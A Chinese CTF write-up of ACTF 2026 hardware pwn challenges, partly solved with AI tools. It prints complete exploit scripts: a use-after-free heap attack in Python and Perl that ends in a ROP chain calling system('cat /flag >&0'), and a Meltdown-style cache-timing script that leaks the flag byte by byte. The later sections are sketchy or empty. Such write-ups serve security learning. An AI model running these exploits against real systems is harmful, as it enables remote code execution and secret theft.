llm for security 4: Actf 2026 pwn: 硬件pwn

2026-06-15

1. babygate(solve)

关于lua脚本加载的题目,程序逻辑如下:
请AI分析关键逻辑后,给出漏洞点 UAF:

#!/usr/bin/env python3
import argparse
import re
import socket
import subprocess
import struct
import sys
import time
from pathlib import Path


LIBC_UNSORTED_LEAK_OFF = 0x204140
LIBC_ENVIRON_OFF = 0x20AD58
LIBC_SYSTEM_OFF = 0x58750
LIBC_POP_RDI_RET_OFF = 0x10F78B
LIBC_RET_OFF = 0x2882F

# In the xinetd/chroot challenge environment this is stable for the
# lua_pkt_write() call reached by the final W command.
STACK_RET_FROM_ENVIRON = 0x4A0


LUA = r'''
local stage = 0
local leak = nil
local keep = {}
local views = {}
local stale = nil
local rw = nil
local rw_off = 0

local function find_rw(mem)
  local pat = string.char(0x77,0x07,0,0,0,0,0,0)
  local pos = mem:find(pat, 1, true)
  local b1 = string.byte(mem, pos - 8) or 0
  local b2 = string.byte(mem, pos - 7) or 0
  return b1 + b2 * 256, pos - 1 - 16
end

gateway.run(function(conn, pkt)
  if stage == 0 then
    keep[#keep + 1] = string.rep("G", 8192)
    conn:close()
    leak = pkt:tostring()
    stage = 1
    return
  end

  if stage == 1 then
    conn:send(leak:sub(1, 64))
    stage = 2
    return
  end

  local data = pkt:tostring()

  if stage == 2 then
    keep[#keep + 1] = string.rep("H", 8192)
    stale = pkt
    conn:close()
    for i = 1, 240 do
      views[i] = pkt:view(i, 0x777)
    end
    local idx, off = find_rw(stale:tostring())
    rw = views[idx]
    rw_off = off
    stale:write(rw_off, data:sub(1, 24))
    stage = 3
    return
  end

  local cmd = data:sub(1, 1)
  if cmd == "R" then
    stale:write(rw_off, data:sub(2, 25))
    conn:send(rw:tostring())
    return
  end

  if cmd == "W" then
    stale:write(rw_off, data:sub(2, 25))
    rw:write(0, data:sub(26))
    conn:send("OK")
    return
  end
end)
EOF
'''.encode()


def p64(x):
    return struct.pack("<Q", x)


def u64(b):
    return struct.unpack("<Q", b[:8].ljust(8, b"\x00"))[0]


def cfg(addr, length, off=0):
    return p64(addr) + p64(off) + p64(length)


def request(host, port, data, timeout=2.0):
    with socket.create_connection((host, port), timeout=3.0) as s:
        s.settimeout(timeout)
        s.sendall(data)
        out = b""
        while True:
            try:
                chunk = s.recv(65536)
            except TimeoutError:
                break
            except socket.timeout:
                break
            if not chunk:
                break
            out += chunk
        return out


def is_local_host(host):
    return host in {"127.0.0.1", "localhost", "::1", "0.0.0.0"}


def find_badgate_container(service_port):
    try:
        ps = subprocess.run(
            ["docker", "ps", "--format", "\t\t\t"],
            check=False,
            capture_output=True,
            text=True,
            timeout=3.0,
        )
    except (OSError, subprocess.SubprocessError):
        return None

    if ps.returncode != 0:
        return None

    candidates = []
    for line in ps.stdout.splitlines():
        parts = line.split("\t", 3)
        if len(parts) != 4:
            continue
        cid, image, name, ports = parts
        label = f"{image} {name}".lower()
        if "badgate" not in label and "gateway" not in label:
            continue
        if f":{service_port}->" not in ports and f"0.0.0.0:{service_port}" not in ports:
            continue
        candidates.append((cid, ports))

    if not candidates:
        return None

    # When only the xinetd entry port is published, the random 10000-12000
    # listener is reachable only from inside the container network namespace.
    for cid, ports in candidates:
        if "10000" not in ports and "12000" not in ports:
            return cid
    return None


PERL_RUNNER = r'''
use strict;
use warnings;
use IO::Select;
use IO::Socket::INET;
use Time::HiRes qw(time);

$| = 1;
binmode STDOUT;

my $LIBC_UNSORTED_LEAK_OFF = 0x204140;
my $LIBC_ENVIRON_OFF = 0x20AD58;
my $LIBC_SYSTEM_OFF = 0x58750;
my $LIBC_POP_RDI_RET_OFF = 0x10F78B;
my $LIBC_RET_OFF = 0x2882F;
my $STACK_RET_FROM_ENVIRON = 0x4A0;

my $LUA = <<'LUA_SCRIPT';
local stage = 0
local leak = nil
local keep = {}
local views = {}
local stale = nil
local rw = nil
local rw_off = 0

local function find_rw(mem)
  local pat = string.char(0x77,0x07,0,0,0,0,0,0)
  local pos = mem:find(pat, 1, true)
  local b1 = string.byte(mem, pos - 8) or 0
  local b2 = string.byte(mem, pos - 7) or 0
  return b1 + b2 * 256, pos - 1 - 16
end

gateway.run(function(conn, pkt)
  if stage == 0 then
    keep[#keep + 1] = string.rep("G", 8192)
    conn:close()
    leak = pkt:tostring()
    stage = 1
    return
  end

  if stage == 1 then
    conn:send(leak:sub(1, 64))
    stage = 2
    return
  end

  local data = pkt:tostring()

  if stage == 2 then
    keep[#keep + 1] = string.rep("H", 8192)
    stale = pkt
    conn:close()
    for i = 1, 240 do
      views[i] = pkt:view(i, 0x777)
    end
    local idx, off = find_rw(stale:tostring())
    rw = views[idx]
    rw_off = off
    stale:write(rw_off, data:sub(1, 24))
    stage = 3
    return
  end

  local cmd = data:sub(1, 1)
  if cmd == "R" then
    stale:write(rw_off, data:sub(2, 25))
    conn:send(rw:tostring())
    return
  end

  if cmd == "W" then
    stale:write(rw_off, data:sub(2, 25))
    rw:write(0, data:sub(26))
    conn:send("OK")
    return
  end
end)
EOF
LUA_SCRIPT

sub p64 {
    return pack("Q<", $_[0]);
}

sub u64 {
    my $b = substr($_[0] . ("\x00" x 8), 0, 8);
    return unpack("Q<", $b);
}

sub cfg {
    my ($addr, $len, $off) = @_;
    $off //= 0;
    return p64($addr) . p64($off) . p64($len);
}

sub send_all {
    my ($sock, $data) = @_;
    while (length($data) > 0) {
        my $sent = $sock->send($data);
        die "send failed\n" unless defined $sent;
        substr($data, 0, $sent, "");
    }
}

sub connect_tcp {
    my ($host, $port) = @_;
    my $sock = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $port,
        Proto => "tcp",
        Timeout => 3,
    );
    die "connect $host:$port failed: $!\n" unless $sock;
    return $sock;
}

sub read_chunk {
    my ($sock, $timeout, $max) = @_;
    my $sel = IO::Select->new($sock);
    return undef unless $sel->can_read($timeout);
    my $buf = "";
    my $ok = $sock->recv($buf, $max);
    return undef unless defined $ok;
    return $buf;
}

sub request {
    my ($host, $port, $data, $timeout) = @_;
    $timeout //= 2.0;
    my $sock = connect_tcp($host, $port);
    send_all($sock, $data);
    my $out = "";
    while (1) {
        my $chunk = read_chunk($sock, $timeout, 65536);
        last unless defined $chunk;
        last if length($chunk) == 0;
        $out .= $chunk;
    }
    close($sock);
    return $out;
}

sub start_gateway {
    my ($host, $port) = @_;
    my $sock = connect_tcp($host, $port);
    my $prompt = read_chunk($sock, 1.0, 4096);
    send_all($sock, $LUA);

    my $banner = "";
    my $deadline = time() + 5.0;
    while (time() < $deadline) {
        if ($banner =~ /:\s*(\d+)/ || $banner =~ /\b(1[01]\d{3}|12000)\b/) {
            close($sock);
            return int($1);
        }
        my $left = $deadline - time();
        my $chunk = read_chunk($sock, $left > 0.5 ? 0.5 : $left, 4096);
        next unless defined $chunk;
        last if length($chunk) == 0;
        $banner .= $chunk;
    }

    close($sock);
    die "failed to parse listener port from: $banner\n";
}

sub exploit {
    my ($host, $port, $command) = @_;
    my $gate_port = start_gateway($host, $port);
    print "[+] gateway data port: $gate_port\n";

    request($host, $gate_port, "A" x 4095);
    my $leak = request($host, $gate_port, "B");
    die "short leak\n" if length($leak) < 32;

    my $libc_leak = u64(substr($leak, 0, 8));
    my $libc_base = $libc_leak - $LIBC_UNSORTED_LEAK_OFF;
    my $heap_leak = u64(substr($leak, 16, 8));
    printf("[+] libc leak: %#x\n", $libc_leak);
    printf("[+] libc base: %#x\n", $libc_base);
    printf("[+] heap leak: %#x\n", $heap_leak);

    my $environ_addr = $libc_base + $LIBC_ENVIRON_OFF;
    my $stage2 = cfg($environ_addr, 8);
    $stage2 .= "C" x (4095 - length($stage2));
    request($host, $gate_port, $stage2);

    my $environ = u64(request($host, $gate_port, "R" . cfg($environ_addr, 8)));
    my $ret_addr = $environ - $STACK_RET_FROM_ENVIRON;
    printf("[+] environ: %#x\n", $environ);
    printf("[+] target ret slot: %#x\n", $ret_addr);

    my $ret = $libc_base + $LIBC_RET_OFF;
    my $pop_rdi = $libc_base + $LIBC_POP_RDI_RET_OFF;
    my $system = $libc_base + $LIBC_SYSTEM_OFF;
    my $cmd = $command . "\x00";
    my $cmd_addr = $ret_addr + 8 * 5;
    my $rop = p64($ret) . p64($pop_rdi) . p64($cmd_addr) . p64($system) . p64(0) . $cmd;

    printf("[+] system: %#x\n", $system);
    print "[+] command: '$command'\n";
    return request($host, $gate_port, "W" . cfg($ret_addr, length($rop)) . $rop, 5.0);
}

my ($host, $port, $command) = @ARGV;
$host //= "127.0.0.1";
$port //= 9999;
$command //= "cat /flag >&0";

my $out = exploit($host, int($port), $command);
print $out;
print "\n" if length($out) && substr($out, -1) ne "\n";
'''


def container_has(container, binary):
    result = subprocess.run(
        ["docker", "exec", container, "sh", "-lc", f"command -v {binary} >/dev/null 2>&1"],
        check=False,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    return result.returncode == 0


def run_inside_container(container, host, port, command):
    if container_has(container, "python3"):
        runner = "python3"
        payload = Path(__file__).read_bytes()
    elif container_has(container, "perl"):
        runner = "perl"
        payload = PERL_RUNNER.encode()
    else:
        raise RuntimeError(f"container {container} has neither python3 nor perl")

    argv = [
        "docker",
        "exec",
        "-i",
        container,
        runner,
        "-",
        "127.0.0.1",
        str(port),
    ]
    if runner == "python3":
        argv += ["--cmd", command, "--no-docker-fallback"]
    else:
        argv += [command]
    return subprocess.run(argv, input=payload, check=False).returncode


def start_gateway(host, port):
    with socket.create_connection((host, port), timeout=3.0) as s:
        s.settimeout(1.0)
        try:
            s.recv(4096)
        except socket.timeout:
            pass
        s.sendall(LUA)

        banner = b""
        deadline = time.time() + 5.0
        while time.time() < deadline:
            m = re.search(rb":\s*(\d+)", banner)
            if not m:
                m = re.search(rb"\b(1[01]\d{3}|12000)\b", banner)
            if m:
                return int(m.group(1))

            s.settimeout(max(0.1, min(0.5, deadline - time.time())))
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                continue
            if not chunk:
                break
            banner += chunk

    raise RuntimeError(f"failed to parse listener port from: {banner!r}")


def exploit(host, port, command):
    gate_port = start_gateway(host, port)
    print(f"[+] gateway data port: {gate_port}", flush=True)

    # Stage 0: close conn, copy freed 0x1000 chunk contents into Lua string.
    request(host, gate_port, b"A" * 4095)

    # Stage 1: send the saved unsorted-bin leak.
    leak = request(host, gate_port, b"B")
    if len(leak) < 32:
        raise RuntimeError(f"short leak: {leak!r}")

    libc_leak = u64(leak[:8])
    libc_base = libc_leak - LIBC_UNSORTED_LEAK_OFF
    heap_leak = u64(leak[16:24])
    print(f"[+] libc leak: {libc_leak:#x}", flush=True)
    print(f"[+] libc base: {libc_base:#x}", flush=True)
    print(f"[+] heap leak: {heap_leak:#x}", flush=True)

    # Stage 2: make the freed packet buffer overlap many pkt:view() userdata
    # objects, then corrupt the first overlapping view into rw.
    environ_addr = libc_base + LIBC_ENVIRON_OFF
    request(host, gate_port, cfg(environ_addr, 8).ljust(4095, b"C"))

    environ = u64(request(host, gate_port, b"R" + cfg(environ_addr, 8)))
    ret_addr = environ - STACK_RET_FROM_ENVIRON
    print(f"[+] environ: {environ:#x}", flush=True)
    print(f"[+] target ret slot: {ret_addr:#x}", flush=True)

    ret = libc_base + LIBC_RET_OFF
    pop_rdi = libc_base + LIBC_POP_RDI_RET_OFF
    system = libc_base + LIBC_SYSTEM_OFF

    cmd = command.encode() + b"\x00"
    cmd_addr = ret_addr + 8 * 5
    rop = b"".join([
        p64(ret),
        p64(pop_rdi),
        p64(cmd_addr),
        p64(system),
        p64(0),
        cmd,
    ])

    print(f"[+] system: {system:#x}", flush=True)
    print(f"[+] command: {command!r}", flush=True)
    out = request(host, gate_port, b"W" + cfg(ret_addr, len(rop)) + rop, timeout=5.0)
    return out


def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("host", nargs="?", default="127.0.0.1")
    ap.add_argument("port", nargs="?", type=int, default=9999)
    ap.add_argument("--cmd", default="cat /flag >&0")
    ap.add_argument("--container", help="run the network part inside this Docker container")
    ap.add_argument("--no-docker-fallback", action="store_true")
    args = ap.parse_args()

    if args.container:
        raise SystemExit(run_inside_container(args.container, args.host, args.port, args.cmd))

    if not args.no_docker_fallback and is_local_host(args.host):
        container = find_badgate_container(args.port)
        if container:
            print(f"[*] detected unpublished random listener; using docker exec in {container}", flush=True)
            raise SystemExit(run_inside_container(container, args.host, args.port, args.cmd))

    out = exploit(args.host, args.port, args.cmd)
    sys.stdout.buffer.write(out)
    if out and not out.endswith(b"\n"):
        sys.stdout.buffer.write(b"\n")


if __name__ == "__main__":
    main()

轻松拿下。

2. amcu-dist(没有环境)

是个固件题目,年赛的时候有遇到类似的,正好看看这种题目一般是怎么做的。
架构图:

flowchart LR
    Player["选手电脑"] <-->|"TCP / nc"| Server["树莓派/部署服务器\nserver.py"]

    Server -->|"GPIO 控 VCC"| Power["目标板电源控制"]
    Server -->|"GPIO 控 BOOT"| Boot["CH32V003 BOOT 引脚控制"]
    Server <-->|"USB"| Link["WCH-Link / minichlink\n烧录器 + 串口设备"]

    Link -->|"SWIO / 烧录 firmware.bin"| MCU["CH32V003F4P6\nRV32E MCU"]
    Link <-->|"UART\nPD5=TX, PD6=RX\n460800 8N1"| MCU

    Power --> MCU
    Boot --> MCU

    MCU <-->|"I2C\nPC1=SDA\nPC2=SCL"| EEPROM["AT24C64 EEPROM\nflag 所在位置"]

逻辑如下:

1. 选手电脑通过tcp链接访问部署了附件server.py
2. server.py接受了选手的请求认证后,会做如下3件事:
      2.1 GPIO控制单板启动电源
      2.2 GIPO控制CH32V003单板进入烧录模式
      2.3 通过usb烧录固件 firmware.bin到单板上
      2.4 对MCU的UART端口转发
3. 单板内部也有结构划分
      3.1 MCU,单板的逻辑处理单元,firmware.bin加载到MCU的内部flash上。 MCU内部还有片内SRAM(即内存)存放运行时数据。
      3.2 I2C,(Inter-Integrated Circuit,读作“I-squared-C”)是一种用于芯片之间通信的串行总线协议
      3.3 EEPROM,Electrically Erasable Programmable Read-Only Memory,电可擦除可编程只读存储器
    EEPROM只能由MCU通过I2C进行读写。
        CH32V003             EEPROM                 作用
        ---------            ------              ---------
        SDA  ---------------- SDA                I²C 的数据线,用来传输数据
        SCL  ---------------- SCL                I²C 的时钟线,用来控制数据传输节奏
        GND  ---------------- GND                地线,电路的电压参考点,通常接电源负极
        3.3V ---------------- VCC                电源正极,用来给芯片供电

4. 选手通过操作MCU,尝试读取EEPROM中的flag。

2.1 MCU如何通过I2C与EEPROM通信

这是题目给的图.
AT24C64 这类 24Cxx EEPROM 的 I2C 地址格式是:

1010 A2 A1 A0 R/W

因为全都接地,所以实际上地址格式为:

1010 00 00 00 R/W = 0xA0 | R/W

R = 1
W = 0
所以 READ指令为 0xA1, WRITE指令为0xA0

2.2 firmware.bin逻辑分析

漏洞其实很简单。

3. ACPU(solve)

又是risc-v架构
这道题的访问接口,实际执行的是run.py文件,该文件会做如下几件事:

1. 读取用户输入的**base64(机器码)**,并解码
2. 把bin/system.mem文件拷贝到 /tmp/rom_file.mem,相当于是每次重新启动时刷新rom_file.mem
3. 用户输入的代码追加到rom_file.mem的 0x100位置处
4. flag写入flag.mem中
5. 运行CPU仿真器simulation

3.1 simulation分析

其实相当于读入了rom_file.memflag.mem到内存中,并直接执行用户输入的程序。
可以让codex分析,得到实际加载到内存的两个mem的地址是多少:
所以可以得知,rom_file.mem存放在0x400的位置,而flag.mem存放在0x80000000开始的位置。

3.2 system.mem分析

LOAD:00000000                 li              t0, 400h   # load immediate, t0=0x400 
LOAD:00000004                 csrw            sepc, t0   # csr write指令,设置sepc(sepc 是 Supervisor Exception Program Counter,即 supervisor 模式下的异常返回地址寄存器) 为0x400,即sret的返回值为0x400
LOAD:00000008                 li              t0, 40h   # t0= 0x40
LOAD:0000000C                 csrw            stvec, t0  # 设置stvec(Supervisor Trap Vector Base Address Register)为0x40,当用户执行ecall或者出现异常,比如非法指令、访问异常等,CPU 就会跳转到 stvec 指定的地址去执行 trap handler) 为0x40
LOAD:00000010                 li              t0, 0  
LOAD:00000014                 lui             sp, 10h  # Load Upper Immediate,把立即数 0x10 放到寄存器 sp 的高位,低 12 位补 0, sp= 0x10<<12 = 0x10000
LOAD:00000018                 sret               # 返回,返回到0x400,即用户的输入     

0x400是用户输入,这里需要重点分析一下0x40,异常处理的代码:

LOAD:00000040                 lui             t0, 10h  # t0= 0x10 
LOAD:00000044                 bgeu            a0, t0, loc_98  # branch if greater or equal , 如果a0 >= 0x10000, 就跳转到loc_98. 
LOAD:00000048                 li              t0, 0   # t0 = 0
LOAD:0000004C                 li              t1, 1   # t1 = 1
LOAD:00000050                 slli            t1, t1, 1Fh # Shift Left Logical Immediate, t1 = t1<<31 = 0x80000000
LOAD:00000054                 mv              t2, a0  # t2 = a0
LOAD:00000058                 li              a0, 0   # a0 = 0
LOAD:0000005C
LOAD:0000005C loc_5C:                                 
LOAD:0000005C                 lw              t3, 0(t1) # load word, t3 = *(uint32 *)(t1+0)
LOAD:00000060                 lw              t4, 0(t2) # t4 = *(uint32 *)(t2+0)
LOAD:00000064                 beq             t3, t4, loc_6C # bran if equal,如果t3 == t4,跳转
LOAD:00000068                 ori             a0, a0, 1 
LOAD:0000006C
LOAD:0000006C loc_6C:                                 
LOAD:0000006C                 addi            t0, t0, 4 
LOAD:00000070                 addi            t1, t1, 4 
LOAD:00000074                 addi            t2, t2, 4 
LOAD:00000078                 li              t3, 40h
LOAD:0000007C                 bne             t0, t3, loc_5C 
LOAD:00000080
LOAD:00000080 loc_80:                                
LOAD:00000080                 li              t0, 0   
LOAD:00000084                 li              t1, 0
LOAD:00000088                 li              t2, 0
LOAD:0000008C                 li              t3, 0
LOAD:00000090                 li              t4, 0
LOAD:00000094                 sret                    
LOAD:00000098 # ---------------------------------------------------------------------------
LOAD:00000098
LOAD:00000098 loc_98:                                
LOAD:00000098                 li              a0, -1  
LOAD:0000009C                 j               loc_80 

其实就是判断你输入的地址是不是在0x10000以内,不是就报异常。
漏洞:本质上利用了meltdown漏洞
利用逻辑如下:

# public_base = 0x1000
# stride      = 0x100
#
# secret_addr = 0x80000000 + (byte_index / 4) * 4
# shift       = (byte_index % 4) * 8
# probe_addr  = public_base + candidate * stride

_start:
    # s0 = public_base
    li      s0, 0x1000

    # t0 = secret_addr
    li      t0, secret_addr

    # 非法读取 flag word
    # 架构上最终不会成功写回,但瞬态值会进入转发路径
    lw      t0, 0(t0)

    # 取出目标 byte
    # 如果 byte_index % 4 == 0,这条可以省略
    srli    t0, t0, shift

    # t0 = secret_byte
    andi    t0, t0, 0xff

    # t0 = secret_byte * 0x100
    slli    t0, t0, 8

    # t0 = public_base + secret_byte * 0x100
    add     t0, s0, t0

    # 用 secret_byte 访问 public cache
    # 这一条是污染 cache 的关键
    lw      t1, 0(t0)

    # t2 = public_base + candidate * 0x100
    li      t2, probe_addr

    # probe candidate
    # 如果 candidate == secret_byte,这里 cache hit,cycles 更少
    lw      s1, 0(t2)

    # 退出仿真
    # pc > 0x1fff 后 Simulation 会打印寄存器和 took cycles
    li      t0, 0x2000
    jalr    zero, t0, 0


非法读 flag
↓
flag 短暂进入 CPU 流水线
↓
用这个临时值访问 public cache
↓
cache 状态发生变化
↓
通过 cycles 快慢判断 flag 字节

3.3 exp

codex 完美解决:


#!/usr/bin/env python3
import argparse
import base64
import re
import socket
import statistics
import string
import struct
import sys


DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 9999
DEFAULT_PREFIX = "ACTF{"
DEFAULT_CHARSET = (
    "}_"
    + string.ascii_lowercase
    + string.ascii_uppercase
    + string.digits
    + "{-!@#$%^&*()+=:;,.?/[]<>|~"
)


def r_type(funct7, rs2, rs1, funct3, rd, opcode=0x33):
    return (
        ((funct7 & 0x7F) << 25)
        | ((rs2 & 0x1F) << 20)
        | ((rs1 & 0x1F) << 15)
        | ((funct3 & 7) << 12)
        | ((rd & 0x1F) << 7)
        | opcode
    )


def i_type(imm, rs1, funct3, rd, opcode=0x13):
    return (
        ((imm & 0xFFF) << 20)
        | ((rs1 & 0x1F) << 15)
        | ((funct3 & 7) << 12)
        | ((rd & 0x1F) << 7)
        | opcode
    )


def lui(rd, imm20):
    return ((imm20 & 0xFFFFF) << 12) | ((rd & 0x1F) << 7) | 0x37


def addi(rd, rs1, imm):
    return i_type(imm, rs1, 0, rd)


def andi(rd, rs1, imm):
    return i_type(imm, rs1, 7, rd)


def slli(rd, rs1, shamt):
    return (shamt << 20) | ((rs1 & 0x1F) << 15) | (1 << 12) | ((rd & 0x1F) << 7) | 0x13


def srli(rd, rs1, shamt):
    return (shamt << 20) | ((rs1 & 0x1F) << 15) | (5 << 12) | ((rd & 0x1F) << 7) | 0x13


def add(rd, rs1, rs2):
    return r_type(0, rs2, rs1, 0, rd)


def lw(rd, rs1, imm):
    return ((imm & 0xFFF) << 20) | ((rs1 & 0x1F) << 15) | (2 << 12) | ((rd & 0x1F) << 7) | 0x03


def jalr(rd, rs1, imm):
    return ((imm & 0xFFF) << 20) | ((rs1 & 0x1F) << 15) | ((rd & 0x1F) << 7) | 0x67


def li(rd, value):
    value &= 0xFFFFFFFF
    hi = (value + 0x800) >> 12
    lo = value - (hi << 12)
    return [lui(rd, hi), addi(rd, rd, lo)]


def pack(insns):
    return b"".join(struct.pack("<I", insn & 0xFFFFFFFF) for insn in insns)


def make_probe_payload(byte_index, candidate, public_base=0x1000, stride=0x100):
    secret_addr = 0x80000000 + (byte_index // 4) * 4
    shift = (byte_index % 4) * 8
    probe_addr = public_base + candidate * stride

    code = []

    # x8/s0 = public_base
    code += li(8, public_base)

    # x5/t0 = *(0x80000000 + word_offset)
    # Architecturally this becomes zero in user mode, but the transient value is
    # forwarded long enough to affect the following public-memory load.
    code += li(5, secret_addr)
    code.append(lw(5, 5, 0))

    if shift:
        code.append(srli(5, 5, shift))
    code.append(andi(5, 5, 0xFF))
    code.append(slli(5, 5, 8))
    code.append(add(5, 8, 5))

    # Touch public_base + secret_byte * stride, bringing one cache line in.
    code.append(lw(6, 5, 0))

    # Probe public_base + candidate * stride. If candidate == secret_byte, this
    # second load hits cache and the final "took N cycles" is lower.
    code += li(7, probe_addr)
    code.append(lw(9, 7, 0))

    # Exit cleanly: pc > 0x1fff makes Simulation dump regs/cycles and finish.
    code += li(5, 0x2000)
    code.append(jalr(0, 5, 0))
    return pack(code)


def recv_until(sock, marker):
    data = bytearray()
    while marker not in data:
        chunk = sock.recv(4096)
        if not chunk:
            raise EOFError("connection closed")
        data += chunk
    return bytes(data)


def run_once(sock, payload):
    sock.sendall(base64.b64encode(payload) + b"\n")
    out = recv_until(sock, b"give me your code:\n").decode("utf-8", "replace")
    match = re.search(r"took\s+(\d+)\s+cycles", out)
    if not match:
        raise RuntimeError(f"no cycle count in service output:\n{out}")
    return int(match.group(1)), out


def score_candidate(sock, byte_index, candidate, retries):
    scores = []
    last_output = ""
    payload = make_probe_payload(byte_index, candidate)
    for _ in range(retries):
        cycles, last_output = run_once(sock, payload)
        scores.append(cycles)
    return statistics.median(scores), scores, last_output


def recover(args):
    charset = args.charset.encode()
    found = bytearray(args.prefix.encode())

    with socket.create_connection((args.host, args.port), timeout=args.timeout) as sock:
        sock.settimeout(args.timeout)
        recv_until(sock, b"give me your code:\n")

        for byte_index in range(len(found), args.max_len):
            results = []
            for candidate in charset:
                median, samples, _ = score_candidate(sock, byte_index, candidate, args.retries)
                results.append((median, candidate, samples))

            results.sort(key=lambda item: item[0])
            best_cycles, best_candidate, best_samples = results[0]
            found.append(best_candidate)

            preview = " ".join(
                f"{chr(c) if 32 <= c < 127 else hex(c)}:{cyc:g}"
                for cyc, c, _ in results[: args.show_top]
            )
            print(
                f"[{byte_index:02d}] {best_candidate:#04x} "
                f"{chr(best_candidate)!r} cycles={best_cycles:g} samples={best_samples} "
                f"top={preview}"
            )
            print(f"flag so far: {found.decode('latin1', 'replace')}", flush=True)

            if best_candidate == ord("}") and byte_index >= len(args.prefix):
                break

    return found.decode("latin1", "replace")


def main():
    parser = argparse.ArgumentParser(description="Exploit ACPU via transient secret load + cache timing.")
    parser.add_argument("--host", default=DEFAULT_HOST)
    parser.add_argument("--port", default=DEFAULT_PORT, type=int)
    parser.add_argument("--prefix", default=DEFAULT_PREFIX, help="known flag prefix to skip/reuse")
    parser.add_argument("--charset", default=DEFAULT_CHARSET)
    parser.add_argument("--max-len", default=64, type=int)
    parser.add_argument("--retries", default=1, type=int)
    parser.add_argument("--timeout", default=20, type=float)
    parser.add_argument("--show-top", default=5, type=int)
    args = parser.parse_args()

    flag = recover(args)
    print(f"\nrecovered: {flag}")


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        sys.exit("\ninterrupted")

4. AGPU

GPU DRIVER的题目